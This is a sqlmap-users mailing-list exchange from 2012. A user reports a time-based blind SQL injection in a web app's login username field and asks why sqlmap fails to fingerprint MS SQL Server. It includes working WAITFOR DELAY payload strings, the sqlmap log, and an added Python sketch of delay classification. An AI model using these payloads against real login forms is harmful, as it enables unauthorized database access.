In fact, don't worry about suggestions for manual syntax, t...@test.com'if
1 = 1 waitfor delay'0:0:20'-- works so I can work with that. But I wonder
why sqlmap is struggling?

Chris

On 22 January 2012 18:12, Chris Oakley <christopher.oak...@gmail.com> wrote:
> Hi
>
> I've got a web app where the username field of the login form is affected
> by the following string: t...@test.com'waitfor delay'0:0:10'-- as a
> username; i.e. the delay happens, the app is vulnerable. It will always
> then return you to the login screen with an invalid email error, but we
> should still be able to exploit the app using time based methods. Sqlmap
> picks up on this, but then fails at the fingerprinting stage, i.e:
>
> [18:04:03] [INFO] testing MySQL
> [18:04:03] [WARNING] time-based comparison needs larger statistical model.
> Making a few dummy requests, please wait..
> [18:04:16] [CRITICAL] there is considerable lagging in connection
> response(s). Please use as high value for --time-sec option as
> possible (e.g. 10 or more)
> [18:04:16] [WARNING] the back-end DBMS is not MySQL
> [18:04:16] [INFO] testing Oracle
> [18:04:17] [WARNING] it is very important not to stress the network
> adapter's bandwidth during usage of time-based queries
> [18:04:17] [WARNING] the back-end DBMS is not Oracle
> [18:04:17] [INFO] testing PostgreSQL
> [18:04:17] [WARNING] the back-end DBMS is not PostgreSQL
> [18:04:17] [INFO] testing Microsoft SQL Server
> [18:04:18] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [18:04:18] [INFO] testing SQLite
> [18:04:18] [WARNING] the back-end DBMS is not SQLite
> [18:04:18] [INFO] testing Microsoft Access
> [18:04:18] [WARNING] the back-end DBMS is not Microsoft Access
> [18:04:18] [INFO] testing Firebird
> [18:04:19] [WARNING] the back-end DBMS is not Firebird
> [18:04:19] [INFO] testing SAP MaxDB
> [18:04:19] [WARNING] the back-end DBMS is not SAP MaxDB
> [18:04:19] [INFO] testing Sybase
> [18:04:19] [WARNING] the back-end DBMS is not Sybase
> [18:04:19] [INFO] testing IBM DB2
> [18:04:19] [WARNING] the back-end DBMS is not IBM DB2
> [18:04:19] [CRITICAL] sqlmap was not able to fingerprint the back-end
> database management system. Support for this DBMS will be
> implemented at some point
>
> I'm not sure why this would be the case, it should be able to find that
> it's MS SQL Server.
>
> Any ideas why this might be the case? I can provide more verbose
> information if required, let me know.
>
> In the meantime, any ideas for some more manual injections taking into
> account the syntax of the injection above? I'm going to have a manual play
> now but I thought you might want to know wrt sqlmap.
>
> Cheers
>
> Chris
>
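
The "larger statistical model" and "considerable lagging" warnings in the quoted log concern how a time-based check separates an injected delay from ordinary response jitter. A simplified sketch of that kind of decision, as an added example that is not part of the original thread and not sqlmap's own code; the constants, function names and sample timings are assumptions constructed for illustration:

```python
import statistics

# Assumed values for illustration; not taken from the thread or from sqlmap.
MIN_SAMPLES = 30   # baseline requests required before any decision is made
STDEV_COEFF = 7    # standard deviations above the mean that count as "delayed"


def baseline_model(response_times):
    """Return (mean, stdev, threshold) for normal, non-delayed responses."""
    if len(response_times) < MIN_SAMPLES:
        raise ValueError("statistical model needs more baseline samples")
    mean = statistics.mean(response_times)
    stdev = statistics.pstdev(response_times)
    return mean, stdev, mean + STDEV_COEFF * stdev


def classify(response_times, observed, requested_delay):
    """Classify one observed response time (seconds) against the baseline.

    Returns 'unreliable' when jitter is so high that a response carrying
    the requested delay would still fall inside the normal range.
    """
    mean, _stdev, threshold = baseline_model(response_times)
    if mean + requested_delay <= threshold:
        return "unreliable"
    if observed >= max(threshold, requested_delay):
        return "delayed"
    return "normal"


# Constructed sample timings in seconds (not measurements from the thread).
STABLE = [0.20 + 0.01 * (i % 5) for i in range(30)]  # low-jitter connection
LAGGY = [0.5 + 1.0 * (i % 4) for i in range(30)]     # high-jitter connection

if __name__ == "__main__":
    for name, times in (("stable", STABLE), ("laggy", LAGGY)):
        mean, stdev, threshold = baseline_model(times)
        print(f"{name}: mean={mean:.2f}s stdev={stdev:.2f}s "
              f"threshold={threshold:.2f}s")
        for delay in (5, 20):
            print(f"  delay={delay}s ->",
                  classify(times, mean + delay, delay))
```

On the high-jitter baseline a 5 second delay cannot be told apart from normal lag while a 20 second delay can, which is the situation the `--time-sec` advice in the log addresses.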
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users